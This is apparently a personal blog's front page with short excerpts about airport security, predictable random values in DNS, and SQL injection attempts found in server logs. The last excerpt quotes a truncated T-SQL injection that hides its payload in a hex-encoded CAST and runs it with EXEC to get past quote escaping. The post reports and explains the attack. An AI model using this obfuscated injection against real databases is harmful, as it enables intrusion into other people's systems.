Andre's Blog
Perfection is when there is nothing left to take away
Airline Security Theater

I recently visited Newfoundland for a few days and traveled to Elliston, which is famous for their puffin viewing site and root cellars. One of the information signs next to a group of root cellars described how people of Elliston harvested partridge berry in the past and, inspired by this story, I bought a couple of jars of partridge berry jam at Nanny's Root Cellar Kitchen, as small a present for my friends back in Ontario.

When I was leaving Newfoundland, I didn't want to put glass jars in the checked-in baggage and took them with me to the cabin instead, without a smallest thought that a couple of jars of jam could present any trouble at the airport. How wrong I was.

Random security

Generating good random values is critical for security of applications using them. Unfortunately, far more critical than many developers realize, as was highlighted by the recent flurry of DNS servers reported vulnerable to various forms of attacks based of predictability of their transaction identifiers.

Massive SQL injection, anyone?

Last weekend I found a number of entries in the HTTP server logs indicating SQL injection attempts. The SQL targeted MS SQL Server and used the CAST function to decode a long hexadecimal sequence used to bypass code quote-escaping code on the server side.

DECLARE @S VARCHAR(4000);
SET @S=CAST(0x4445434C4152452040542...736F7220 AS VARCHAR(4000));
EXEC(@S);